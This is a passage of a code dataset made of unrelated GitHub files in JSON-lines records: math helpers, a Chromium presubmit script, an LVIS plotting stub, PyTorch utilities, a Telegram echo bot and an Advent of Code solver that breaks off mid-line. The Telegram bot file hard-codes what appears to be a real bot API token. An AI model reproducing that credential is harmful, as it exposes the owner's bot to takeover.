w.write(\"\\\\addplot[\\ncolor=blue,\\nmark=square,\\n]\\ncoordinates {\\n\")\n for i in range(len(array)):\n w.write(\"(\" + str(array[i][0]) + \",\" + str(array[i][1]) + \")\")\n w.write(\"\\n};\\n\\n\")\n w.write(\"\\end{axis}\\n\\end{tikzpicture}\\n\\end{document}\")\n\ndef elliptic_card(a,b,m):\n ''' Gets the cardinality (number of solutions) on an elliptic curve. Follows form y^2 = x^3 + ax + b mod m. 
Counts the point at infinity\n Keyword arguments:\n a - the a value in the formula\n b - the b value in the formula\n\n returns an int of the cardinality of the function\n '''\n x = []\n y = []\n card = 1\n for i in range(m):\n y.append(mod(i**2, m))\n for i in range(m):\n x.append(mod((i**3 + a*i + b), m))\n for i in range(len(x)):\n for j in range(len(y)):\n if x[i] == y[j]:\n card = card + 1\n return card\n\ndef is_prime(n):\n \"\"\" Checks if a number is prime.\n\n Keyword arguments:\n n - the possible prime to check\n returns true if n is prime but false if not.\n \"\"\"\n if n < 2:\n return False\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True\n","repo_name":"iblacksand/PyMathTools","sub_path":"PyMathTools.py","file_name":"PyMathTools.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32215102383","text":"PRESUBMIT_VERSION = '2.0.0'\n\nimport fnmatch\nimport os\nimport sys\n\n# CIPD ensure manifest for checking CIPD client itself.\nCIPD_CLIENT_ENSURE_FILE_TEMPLATE = r'''\n# Fully supported.\n$VerifiedPlatform linux-amd64 mac-amd64 windows-amd64 windows-386\n# Best effort support.\n$VerifiedPlatform linux-386 linux-ppc64 linux-ppc64le linux-s390x\n$VerifiedPlatform linux-arm64 linux-armv6l\n$VerifiedPlatform linux-mips64 linux-mips64le linux-mipsle\n\n%s %s\n'''\n\n# Timeout for a test to be executed.\nTEST_TIMEOUT_S = 330 # 5m 30s\n\n\ndef CheckPylint(input_api, output_api):\n \"\"\"Gather all the pylint logic into one place to make it self-contained.\"\"\"\n files_to_check = [\n r'^[^/]*\\.py$',\n r'^testing_support/[^/]*\\.py$',\n r'^tests/[^/]*\\.py$',\n r'^recipe_modules/.*\\.py$', # Allow recursive search in recipe modules.\n ]\n files_to_skip = list(input_api.DEFAULT_FILES_TO_SKIP)\n if os.path.exists('.gitignore'):\n with open('.gitignore', encoding='utf-8') as fh:\n lines = [l.strip() for l in fh.readlines()]\n files_to_skip.extend([fnmatch.translate(l) for l in lines if\n l and not l.startswith('#')])\n if os.path.exists('.git/info/exclude'):\n with open('.git/info/exclude', encoding='utf-8') as fh:\n lines = [l.strip() for l in fh.readlines()]\n files_to_skip.extend([fnmatch.translate(l) for l in lines if\n l and not l.startswith('#')])\n disabled_warnings = [\n 'R0401', # Cyclic import\n 'W0613', # Unused argument\n 'C0415', # import-outside-toplevel\n 'R1710', # inconsistent-return-statements\n 'E1101', # no-member\n 'E1120', # no-value-for-parameter\n 'R1708', # stop-iteration-return\n 'W1510', # subprocess-run-check\n # Checks which should be re-enabled after Python 2 support is removed.\n 'R0205', # useless-object-inheritance\n 'R1725', # super-with-arguments\n 'W0707', # raise-missing-from\n 'W1113', # keyword-arg-before-vararg\n ]\n return input_api.RunTests(input_api.canned_checks.GetPylint(\n input_api,\n output_api,\n files_to_check=files_to_check,\n files_to_skip=files_to_skip,\n disabled_warnings=disabled_warnings,\n version='2.7'), parallel=False)\n\n\ndef CheckRecipes(input_api, output_api):\n file_filter = lambda x: x.LocalPath() == 'infra/config/recipes.cfg'\n return input_api.canned_checks.CheckJsonParses(input_api, output_api,\n file_filter=file_filter)\n\n\ndef CheckUsePython3(input_api, output_api):\n results = []\n\n if sys.version_info.major != 3:\n results.append(\n output_api.PresubmitError(\n 
'Did not use Python3 for //tests/PRESUBMIT.py.'))\n\n return results\n\n\ndef CheckJsonFiles(input_api, output_api):\n return input_api.canned_checks.CheckJsonParses(\n input_api, output_api)\n\n\ndef CheckUnitTestsOnCommit(input_api, output_api):\n \"\"\" Do not run integration tests on upload since they are way too slow.\"\"\"\n\n input_api.SetTimeout(TEST_TIMEOUT_S)\n\n # Run only selected tests on Windows.\n test_to_run_list = [r'.*test\\.py$']\n tests_to_skip_list = []\n if input_api.platform.startswith(('cygwin', 'win32')):\n print('Warning: skipping most unit tests on Windows')\n tests_to_skip_list.extend([\n r'.*auth_test\\.py$',\n r'.*git_common_test\\.py$',\n r'.*git_hyper_blame_test\\.py$',\n r'.*git_map_test\\.py$',\n r'.*ninjalog_uploader_test\\.py$',\n r'.*recipes_test\\.py$',\n ])\n\n tests = input_api.canned_checks.GetUnitTestsInDirectory(\n input_api,\n output_api,\n 'tests',\n files_to_check=test_to_run_list,\n files_to_skip=tests_to_skip_list)\n\n return input_api.RunTests(tests)\n\n\ndef CheckCIPDManifest(input_api, output_api):\n # Validate CIPD manifests.\n root = input_api.os_path.normpath(\n input_api.os_path.abspath(input_api.PresubmitLocalPath()))\n rel_file = lambda rel: input_api.os_path.join(root, rel)\n cipd_manifests = set(rel_file(input_api.os_path.join(*x)) for x in (\n ('cipd_manifest.txt',),\n ('bootstrap', 'manifest.txt'),\n ('bootstrap', 'manifest_bleeding_edge.txt'),\n\n # Also generate a file for the cipd client itself.\n ('cipd_client_version',),\n ))\n affected_manifests = input_api.AffectedFiles(\n include_deletes=False,\n file_filter=lambda x:\n input_api.os_path.normpath(x.AbsoluteLocalPath()) in cipd_manifests)\n tests = []\n for path in affected_manifests:\n path = path.AbsoluteLocalPath()\n if path.endswith('.txt'):\n tests.append(input_api.canned_checks.CheckCIPDManifest(\n input_api, output_api, path=path))\n else:\n pkg = 'infra/tools/cipd/${platform}'\n ver = input_api.ReadFile(path)\n tests.append(input_api.canned_checks.CheckCIPDManifest(\n input_api, output_api,\n content=CIPD_CLIENT_ENSURE_FILE_TEMPLATE % (pkg, ver)))\n tests.append(input_api.canned_checks.CheckCIPDClientDigests(\n input_api, output_api, client_version_file=path))\n\n return input_api.RunTests(tests)\n\n\ndef CheckOwnersFormat(input_api, output_api):\n return input_api.canned_checks.CheckOwnersFormat(input_api, output_api)\n\n\ndef CheckOwnersOnUpload(input_api, output_api):\n return input_api.canned_checks.CheckOwners(input_api, output_api,\n allow_tbr=False)\n\ndef CheckDoNotSubmitOnCommit(input_api, output_api):\n return input_api.canned_checks.CheckDoNotSubmit(input_api, output_api)\n\n\ndef CheckPatchFormatted(input_api, output_api):\n # TODO(https://crbug.com/979330) If clang-format is fixed for non-chromium\n # repos, remove check_clang_format=False so that proto files can be formatted\n return input_api.canned_checks.CheckPatchFormatted(input_api,\n output_api,\n check_clang_format=False)\n","repo_name":"iridium-browser/iridium-browser","sub_path":"third_party/depot_tools/PRESUBMIT.py","file_name":"PRESUBMIT.py","file_ext":"py","file_size_in_byte":5879,"program_lang":"python","lang":"en","doc_type":"code","stars":314,"dataset":"github-code","pt":"53"} +{"seq_id":"3285309039","text":"\n'''\nAn example of how to use the \nLVIS python scripts\n'''\n\n# import the HDF5 data handler class\n\nfrom lvisClass import lvisData\n\n\n\n##########################################\n\nclass plotLVIS(lvisData):\n '''A class, inheriting from lvisData\n and adding a plotting 
method'''\n\n def reprojectLVIS(self,outEPSG):\n '''A method to reproject the geolocation data'''\n # method incomplete\n\n\n def plotWaves(self):\n '''A method to plot all waveforms'''\n # this needs completing\n\n\n\n##########################################\n\n\nif __name__==\"__main__\":\n '''Main block'''\n\n filename='/geos/netdata/oosa/week4/lvis_antarctica/ILVIS1B_AQ2015_1014_R1605_070717.h5'\n\n # create instance of class with \"onlyBounds\" flag\n b=plotLVIS(filename,onlyBounds=True)\n\n # to make a MWE,\n # from the total file bounds\n # choose a spatial subset\n x0=b.bounds[0]\n y0=b.bounds[1]\n x1=(b.bounds[2]-b.bounds[0])/20+b.bounds[0]\n y1=(b.bounds[3]-b.bounds[1])/20+b.bounds[1]\n\n\n # read in all data within our spatial subset\n lvis=plotLVIS(filename,minX=x0,minY=y0,maxX=x1,maxY=y1)\n\n # set elevation\n lvis.setElevations()\n\n\n # reproject the data\n\n # plot up some waveforms using your new method\n\n","repo_name":"edinburgh-university-OOSA/OOSA-code-public","sub_path":"week4/hdf/lvisExample.py","file_name":"lvisExample.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"3754517773","text":"import json\nimport six\nfrom six.moves import cPickle\n\ndef set_lr(optimizer, lr):\n for group in optimizer.param_groups:\n group['lr'] = lr\n\ndef add_summary_value(writer, key, value, iteration):\n if writer:\n writer.add_scalar(key, value, iteration)\n\ndef pickle_load(f):\n \"\"\" Load a pickle.\n Parameters\n ----------\n f: file-like object\n \"\"\"\n if six.PY3:\n return cPickle.load(f, encoding='latin-1')\n else:\n return cPickle.load(f)\n\ndef pickle_dump(obj, f):\n \"\"\" Dump a pickle.\n Parameters\n ----------\n obj: pickled object\n f: file-like object\n \"\"\"\n if six.PY3:\n return cPickle.dump(obj, f, protocol=2)\n else:\n return cPickle.dump(obj, f)\n\ndef verb_rank_merge(la, lb):\n merge_idx = []\n same_idx = []\n idx_in_b = [] # order of the shared values in list b\n origin_idx_in_b = []\n for idx_a in la:\n merge_idx.append(idx_a) # copy la into merge_idx\n for j, idx_b in enumerate(lb):\n if idx_a == idx_b:\n same_idx.append(idx_a)\n idx_in_b.append(j)\n origin_idx_in_b.append(j)\n break\n # check whether the same_idx entries in lb are out of order\n idx_in_b.sort()\n if origin_idx_in_b != idx_in_b:\n for j, idx in enumerate(idx_in_b):\n lb[idx] = same_idx[j]\n # iterate over the non-overlapping words in lb and insert them into la\n right_idx = None\n right_idxs = {}\n for idx in reversed(lb):\n if idx not in same_idx:\n right_idxs[idx] = right_idx\n else:\n right_idx = idx\n for idx in lb:\n if idx not in same_idx:\n r_idx = right_idxs[idx]\n if r_idx is None:\n merge_idx.append(idx)\n else:\n for j, idx_m in enumerate(merge_idx):\n if idx_m == r_idx:\n merge_idx.insert(j, idx)\n break\n return merge_idx\n\ndef clip_gradient(optimizer, grad_clip):\n for group in optimizer.param_groups:\n for param in group['params']:\n param.grad.data.clamp_(-grad_clip, grad_clip)\n\ndef get_mapping(word_file):\n dict_ = {}\n word_list = []\n # idx = 0 means no verb\n word_list.append('non-verb')\n with open(word_file) as f:\n verb_2_idx = json.load(f)\n verb_num = len(verb_2_idx) + 1\n for verb, idx in verb_2_idx.items():\n dict_[verb] = idx + 1\n word_list.append(verb)\n\n return dict_, word_list, verb_num\n","repo_name":"mad-red/VSR-guided-CIC","sub_path":"utils/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"53"} +{"seq_id":"26153588190","text":"# Function Map and 
filter\n# Example 1: the map function applies another function to a list\ndef add_five(x):\n\treturn x + 5\nnums = [11, 22, 33, 44, 55]\nresult = list(map(add_five, nums))\nprint(result)\n# this can also be written with an anonymous lambda function\nnums = [11, 22, 33, 44, 55]\nresult = list(map(lambda x: x + 5, nums))\nprint(result)\n# Example 2: the filter function removes list elements that do not satisfy the function's condition\nnums = [11, 22, 33, 44, 55]\nres = list(filter(lambda x: x % 2 == 0, nums))\nprint(res)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"zarkaltair/Learn-python","sub_path":"Lessons by HoudyHo/lesson (26).py","file_name":"lesson (26).py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30052778162","text":"import logging\n\nfrom aiogram import Bot, Dispatcher, executor, types\n\nAPI_TOKEN = \"6088589041:AAERXBaGeGOcvtzfbSfGoCNm-b_1u30V-zE\"\nlogging.basicConfig(level=logging.INFO)\n\nbot = Bot(token=API_TOKEN)\ndp = Dispatcher(bot)\n\n\n@dp.message_handler(commands=['start', 'help'])\nasync def send_hush_kelibsiz(message: types.Message):\n await message.reply(\"Salom men Sunnat botman Sunnatillo tomonidan yaratilganman\")\n\n\n@dp.message_handler()\nasync def answer(message: types.Message):\n await message.reply(message.text)\n\n\nif __name__ == '__main__':\n executor.start_polling(dp, skip_updates=True)\n","repo_name":"sunnatila/echo-bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2680424989","text":"\nimport sys\nfrom distutils.core import setup, Extension\n\nif sys.version_info[0] == 2:\n\tver_define = ('PYTHON2', '1')\nelif sys.version_info[0] == 3:\n\tver_define = ('PYTHON3', '1')\n\nlibjio = Extension(\"libjio\",\n\t\tlibraries = ['jio'],\n\t\tsources = ['libjio.c'],\n\t\tdefine_macros = [ver_define],\n\n\t\t# these two allow us to build without having libjio installed,\n\t\t# assuming we're in the libjio source tree\n\t\tinclude_dirs = ['../../libjio/'],\n\t\tlibrary_dirs=['../../libjio/build/']\n\t)\n\nsetup(\n\tname = 'libjio',\n\tversion = '1.02',\n\tdescription = \"A library for journaled, transactional I/O\",\n\tauthor = \"Alberto Bertogli\",\n\tauthor_email = \"albertito@blitiri.com.ar\",\n\turl = \"http://blitiri.com.ar/p/libjio\",\n\text_modules = [libjio],\n\tclassifiers = [\n\t\t\"License :: Public Domain\",\n\t\t\"Operating System :: POSIX\",\n\t\t\"Programming Language :: C\",\n\t\t\"Programming Language :: Python\",\n\t\t\"Programming Language :: Python :: 2\",\n\t\t\"Programming Language :: Python :: 3\",\n\t\t\"Topic :: Software Development\",\n\t\t\"Topic :: Software Development :: Libraries\",\n\t],\n)\n\n","repo_name":"albertito/libjio","sub_path":"bindings/python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"43040673780","text":"# Johann Diep (jdiep@student.ethz.ch) - January 2019\n\n# This file is responsible for the optimization algorithm.\n\n\n# external libraries\nimport torch\nimport math\nfrom tqdm import tqdm\nfrom pyquaternion import Quaternion\n\n\ntorch.set_default_tensor_type(torch.cuda.FloatTensor) # using CUDA\n\n\nclass Optimization():\n\tdef __init__(self, framework, cur_tran_SE3, cur_quat):\n\t\tsuper(Optimization, self).__init__()\n\n\t\tself.framework = framework # 
initializing framework\n\t\t\n\t\t# ground-truth pose\n\t\tself.cur_tran_SE3 = cur_tran_SE3\n\t\tself.cur_quat = cur_quat\n\n\t\tself.rounds = 100 # max rounds for iterations\n\t\tself.minimal_loss = 99999999999 # random high number\n\t\tself.convergence = False # convergence flag\n\n\tdef Adam(self):\n\t\tlr = 0.01 # learning rate\n\t\t\n\t\tprint(\"*** Start optimization with Adam algorithm with learning rate {}.\".format(lr)) # print statement\n\n\t\toptimizer = torch.optim.Adam(self.framework.parameters(), lr = lr) # optimizer to be tuned\n\n\t\tloop = tqdm(range(self.rounds)) # rounds visualization\n\n \t# loop optimization\n\t\tfor i in loop:\n\t\t\t# current loop translation\n\t\t\tsolved_pose_se3 = self.framework.cur_pose_se3\n\t\t\tsolved_tran_SE3 = (self.framework.se3_exp(solved_pose_se3)[0,:,3]).detach().cpu().numpy()\n\t\t\t\n\t\t\tsolved_tran_error = math.sqrt((solved_tran_SE3[0] - self.cur_tran_SE3[0]) ** 2 + (solved_tran_SE3[1] - self.cur_tran_SE3[1]) ** 2 + (solved_tran_SE3[2] - self.cur_tran_SE3[2]) ** 2) # current loop translation error\n\n\t\t\tminimal_tran_SE3 = solved_tran_SE3 # copy\n\t\t\t\n\t\t\t# current loop rotation\n\t\t\tsolved_aa = (self.framework.cur_pose_se3[3:]).detach().cpu().numpy()\n\t\t\tsolved_aa_angle = math.sqrt(solved_aa[0] ** 2 + solved_aa[1] ** 2 + solved_aa[2] ** 2)\n\n\t\t\tsolved_rot_error = math.fabs(solved_aa_angle - Quaternion(self.cur_quat).angle) # current loop rotation error\n\n\t\t\tminimal_aa = solved_aa # copy\n\t\t\tminimal_aa_angle = solved_aa_angle # copy\n\n\t\t\t# convergence condition\n\t\t\tif (solved_tran_error < 0.01 and solved_rot_error < 0.02):\n\t\t\t\tloop.close()\n\t\t\t\tself.convergence = True\n\t\t\t\tbreak\n\n\t\t\toptimizer.zero_grad() # set gradients to zero \n \n\t\t\t# calculating loss function and backpropagating\n\t\t\tloss = self.framework.forward()\n\t\t\tloss.backward()\n\t\t\toptimizer.step()\n\n\t\t\t# if no convergence, take the closest solution\n\t\t\tif loss.data < self.minimal_loss:\n\t\t\t\tself.minimal_loss = loss.data\n\n\t\t\t\t# save pose\n\t\t\t\tminimal_tran_SE3 = solved_tran_SE3\n\t\t\t\tminimal_aa = solved_aa\n\t\t\t\tminimal_aa_angle = solved_aa_angle\n\t\t\t\tminimal_pose_se3 = self.framework.cur_pose_se3\n\n\n\t\t\tloop.set_description(\"*** Optimizing, current loss at %.4f.\" % loss.data) # loss print\n\n\t\t# if convergence\n\t\tif self.convergence == True:\n\t\t\tprint(solved_pose_se3)\n\t\t\tsolved_quat = Quaternion(axis = solved_aa / solved_aa_angle, angle = solved_aa_angle) \n\t\t\treturn solved_tran_SE3, solved_quat\n\n\t\t# if no convergence\n\t\telse:\n\t\t\tprint(minimal_pose_se3)\n\t\t\tminimal_quat = Quaternion(axis = minimal_aa / minimal_aa_angle, angle = minimal_aa_angle)\n\t\t\treturn minimal_tran_SE3, minimal_quat","repo_name":"johanndiep/semester-thesis","sub_path":"neural_mesh_renderer/OBMBACPE/lib/optimization.py","file_name":"optimization.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18049573101","text":"import datetime\nimport json\nimport user_interaction as ui\n\n\ndef create_note(notes):\n note_id = get_unique_id(notes)\n note_title = ui.read(\"Введите заголовок заметки\")\n note_body = ui.read(\"Введите содержимое заметки\")\n note_created_at = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n return {\n \"id\" : note_id,\n \"title\" : note_title,\n \"body\" : note_body,\n \"created_at\" : note_created_at,\n \"last_update\" : note_created_at\n 
}\n\n\ndef update_note(note):\n title = ui.read(\"Введите новый заголовок:\")\n body = ui.read(\"Введите новое содержимое:\")\n note['title'] = title\n note['body'] = body\n note['last_update'] = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n\ndef delete_note(notes, note_id):\n for note in notes:\n if note['id'] == int(note_id):\n notes.remove(note)\n return True\n return False\n\n\ndef get_unique_id(data):\n ids = set()\n for item in data:\n if 'id' in item:\n ids.add(item['id'])\n\n new_unique_id = 0\n while new_unique_id in ids:\n new_unique_id += 1\n\n return new_unique_id\n","repo_name":"InVeRnyako/Python_test_01","sub_path":"edit.py","file_name":"edit.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4251718435","text":"import numpy as np\nfrom os.path import join\nimport tensorflow as tf\n\nfrom tf_parser import Parser\n\n#device_string = '/device:GPU:0'\ndevice_string = '/device:CPU:0'\n\n## definition of epoch in terms of batch number\n## 34801/1004/1509 Train/Valid/Test data\nbatch_size = 32\nbatch_per_training_epoch = int(np.floor(5*1004/32)) #int(np.floor(7490/32))\n\n## batches to be used during statistics collections\nbatch_per_validation_epoch = int(np.floor(1004/32)) #int(np.floor(994/32))\n\nlearning_rate_info = dict()\nlearning_rate_info['init_rate'] = 0.0005\nlearning_rate_info['decay_steps'] = 30 * batch_per_validation_epoch\nlearning_rate_info['decay_factor'] = 0.95\nlearning_rate_info['staircase']=True\n\n##loss operations\nloss_op=tf.losses.sparse_softmax_cross_entropy\none_hot=False\nloss_op_kwargs = None\n\n##optimizers\noptimizer = tf.train.AdamOptimizer\noptimizer_kwargs = None\n\nimage_height = 128\nimage_width = 128\nimage_channel = 3\n\nclass_numbers = 7\nclass_weights = np.array([21.48717949, 12.85933504, 6.22277228, 5.93624557, 1., 46.12844037, 53.4893617])\nclass_weights = class_weights[np.newaxis, 1]\n\ncheckpoint_path = './checkpoints4'\nmodel_checkpoint_path = join( checkpoint_path, 'model.ckpt')\nprior_weights = None\ntrain_summary_path = join( checkpoint_path, 'train' )\nvalid_summary_path = join( checkpoint_path, 'valid' )\n\n\ntrain_tfrecords = '/home/rajib/skin/record/train.tfrecords'\nvalid_tfrecords = '/home/rajib/skin/record/test.tfrecords'\n\n## information for parsing the tfrecord\nfeatures = {'image': tf.FixedLenFeature([], tf.string),\n 'disease_label': tf.FixedLenFeature([], tf.int64),\n 'cancer_label' : tf.FixedLenFeature([], tf.int64),\n 'decision_type' : tf.FixedLenFeature([], tf.int64),\n 'age' : tf.FixedLenFeature([], tf.float32),\n 'sex' : tf.FixedLenFeature([], tf.int64),\n 'localization' : tf.FixedLenFeature([], tf.int64)}\ntrain_parser = Parser(features, True, image_height, image_width)\nvalid_parser = Parser(features, False, image_height, image_width)\n","repo_name":"rajibchakravorty/ham_analysis","sub_path":"analysis/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24196701965","text":"import typing as T\n\nimport hydra\nimport omegaconf\nimport pytorch_lightning as pl\n\n\ndef instantiate_callbacks(callbacks_cfg: omegaconf.DictConfig) -> T.List[pl.Callback]:\n \"\"\"Instantiates callbacks from config.\"\"\"\n\n callbacks: T.List[pl.Callback] = []\n\n if not callbacks_cfg:\n return callbacks\n\n if not isinstance(callbacks_cfg, omegaconf.DictConfig):\n raise 
TypeError(\"Callbacks config must be a DictConfig!\")\n\n for _, cb_conf in callbacks_cfg.items():\n if isinstance(cb_conf, omegaconf.DictConfig) and \"_target_\" in cb_conf:\n callbacks.append(hydra.utils.instantiate(cb_conf))\n\n return callbacks\n","repo_name":"chris-santiago/vime","sub_path":"vime/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32990933352","text":"import datetime\n\nfrom django.test import TestCase\nfrom pysnmp.hlapi import ObjectIdentity, ObjectType\n\nfrom .. import constants, models\n\n\ndef make_timestamp() -> float:\n \"\"\"\n Calculates current time as numbers of seconds since epoch.\n\n :return: timestamp\n \"\"\"\n return (datetime.datetime.utcnow() - constants.EPOCH).total_seconds()\n\n\nclass DataTestCase(TestCase):\n \"\"\"\n Base class for test requiring fixtures and/or payloads.\n \"\"\"\n fixtures = ['collector/tests/fixtures.json']\n\n @classmethod\n def setUpTestData(cls):\n cls.hostname = 'host1'\n host = models.Host.objects.get(name=cls.hostname)\n\n base_payload = {\n 'host': cls.hostname,\n 'timestamp': make_timestamp()\n }\n\n cls.payload = dict(base_payload)\n cls.payload['samples'] = [\n {\n 'parameter': parameter.name,\n 'instance': instance.name,\n 'value': 1\n }\n for instance in host.instances.all()\n for parameter in instance.group.parameters.all()\n ]\n\n cls.payload_int = dict(base_payload)\n cls.payload_int['samples'] = [\n {\n 'parameter': 'CPU',\n 'value': 10\n }\n ]\n\n cls.payload_float = dict(base_payload)\n cls.payload_float['samples'] = [\n {\n 'parameter': 'CPU',\n 'value': 10.1\n }\n ]\n\n cls.payload_bool = dict(base_payload)\n cls.payload_bool['samples'] = [\n {\n 'parameter': 'CPU',\n 'value': True\n }\n ]\n\n cls.payload_str = dict(base_payload)\n cls.payload_str['samples'] = [\n {\n 'parameter': 'CPU',\n 'value': 'spam'\n }\n ]\n\n cls.payload_array = dict(base_payload)\n cls.payload_array['samples'] = [\n {\n 'parameter': 'CPU',\n 'value': ['spam', 'ham', 'egg']\n }\n ]\n\n\ndef get_cmd_factory(cls, value):\n \"\"\"\n A function factory producing replacements for pysnmp.hlapi.getCmd.\n Its products are used in tests to decouple testing from external\n entities by mimicking SNMP GET results normally fetched over the\n network. All SNMP objects are of cls type and have value of value.\n\n :param cls: expected type of SNMP object\n :param value: expected value of SNMP object\n :return: a callable with same API as pysnmp.hlapi.getCmd\n \"\"\"\n def wrapper(_snmp_engine, _auth_data, _transport_target, _context_data,\n *var_binds, **_options):\n \"\"\"\n Ignores all parameters but var_binds and returns it updated with\n value. 
Accepts same arguments and returns similar result as\n pysnmp.hlapi.getCmd.\n\n :param _snmp_engine: ignored parameter\n :param _auth_data: ignored parameter\n :param _transport_target: ignored parameter\n :param _context_data: ignored parameter\n :param var_binds: tuple of parameters\n :param _options: ignored parameter\n :return: same as pysnmp.hlapi.getCmd\n \"\"\"\n def make_value(parameter):\n \"\"\"\n Takes given parameter and returns it recreated and filled in\n with value.\n\n :param parameter: SNMP parameter\n :return: SNMP parameter with value\n \"\"\"\n parameter._ObjectType__state = ObjectType.stClean\n parameter._ObjectType__args[0].__stage = ObjectIdentity.stClean\n identity, _value = parameter\n oid = str(identity._ObjectIdentity__args[0])\n identity = ObjectIdentity(oid)\n identity._ObjectIdentity__oid = oid\n identity._ObjectIdentity__state = ObjectIdentity.stClean\n val = ObjectType(identity, cls(value))\n val._ObjectType__state = ObjectType.stClean\n return val\n\n return iter(\n [[None, 0, 0, [make_value(bind) for bind in var_binds]]]\n )\n return wrapper\n","repo_name":"watcheye/watcheye-collector","sub_path":"collector/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"16551525553","text":"import inspect\n\n\nclass A:\n\n @classmethod\n def b(cls, id=1):\n return id\n\n\nif __name__ == '__main__':\n key_pattern = \"%s:%s:v2\" % (\"{cls.__name__}\", \"{id}\")\n print(A.__name__)\n rv = inspect.getfullargspec(A.b)\n arg_names, kwonlydefaults = rv.args, rv.kwonlydefaults\n print(arg_names, kwonlydefaults)\n\n kw = kwonlydefaults.copy() if kwonlydefaults is not None else {}\n kw.update(zip(arg_names, [A, 1]))\n if callable(key_pattern):\n key = key_pattern(*[kw[name] for name in arg_names])\n else:\n key = key_pattern.format(*[kw[n] for n in arg_names], **kw)\n print(key)\n","repo_name":"nnlrl/MyBlog","sub_path":"models/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35452248335","text":"# https://leetcode-cn.com/contest/biweekly-contest-26/problems/simplified-fractions/\nfrom typing import List\n\nclass Solution:\n\n def hcf(self, x,y):\n if x > y: smaller = y\n else: smaller = x\n\n for i in range(1, smaller + 1):\n if ((x % i == 0) and (y % i == 0)):\n hcf = i\n\n return hcf\n\n def simplifiedFractions(self, n: int) -> List[str]:\n if n == 0 or n ==1: return []\n res = []\n for i in range(2,n+1):\n for j in range(1, i):\n if self.hcf(i,j) == 1:\n res.append(str(j) + \"/\" + str(i))\n\n return res\n\n\ns = Solution()\nprint(s.simplifiedFractions(2))","repo_name":"azhu51/leetcode-practice","sub_path":"contest/medium_5397.py","file_name":"medium_5397.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13316388980","text":"def get_segments():\n with open(\"input.txt\", \"r\") as f:\n return [[x.split() for x in line.strip().split(' | ')] for line in f]\n\n\nsegments = get_segments()\npart_a = 0\npart_b = 0\nfor segment in segments:\n # Part 1\n seg_1s = [len(output) == 2 for output in segment[1]]\n seg_4s = [len(output) == 4 for output in segment[1]]\n seg_7s = [len(output) == 3 for output in segment[1]]\n seg_8s = [len(output) == 7 for output in segment[1]]\n part_a += sum([sum(seg_1s), sum(seg_4s), 
sum(seg_7s), sum(seg_8s)])\n\n    # Part 2\n    # Start with knowns\n    code_1 = ''.join(sorted([x for x in segment[0] if len(x) == 2][0]))\n    code_4 = ''.join(sorted([x for x in segment[0] if len(x) == 4][0]))\n    code_7 = ''.join(sorted([x for x in segment[0] if len(x) == 3][0]))\n    code_8 = ''.join(sorted([x for x in segment[0] if len(x) == 7][0]))\n    decode = {code_1: '1', code_4: '4', code_7: '7', code_8: '8'}\n\n    # Determine len sixes\n    len_sixes = [x for x in segment[0] if len(x) == 6]\n    seg_6 = [x for x in len_sixes if len(set(x).intersection(code_1)) == 1][0]\n    seg_9 = [x for x in len_sixes if len(set(x).intersection(code_4)) == 4][0]\n    seg_0 = [x for x in len_sixes if (x != seg_6) & (x != seg_9)][0]\n    decode[''.join(sorted(seg_6))] = '6'\n    decode[''.join(sorted(seg_9))] = '9'\n    decode[''.join(sorted(seg_0))] = '0'\n\n    # Determine len fives\n    len_fives = [x for x in segment[0] if len(x) == 5]\n    seg_3 = [x for x in len_fives if len(set(x).intersection(code_1)) == 2][0]\n    seg_2 = [x for x in len_fives if len(set(x).intersection(code_4)) == 2][0]\n    seg_5 = [x for x in len_fives if (x != seg_2) & (x != seg_3)][0]\n    decode[''.join(sorted(seg_2))] = '2'\n    decode[''.join(sorted(seg_3))] = '3'\n    decode[''.join(sorted(seg_5))] = '5'\n\n    decoded_output = int(''.join([decode.get(''.join(sorted(output)), output) for output in segment[1]]))\n    part_b += decoded_output\n\nprint(f'Part A is {part_a}')\nprint(f'Part B is 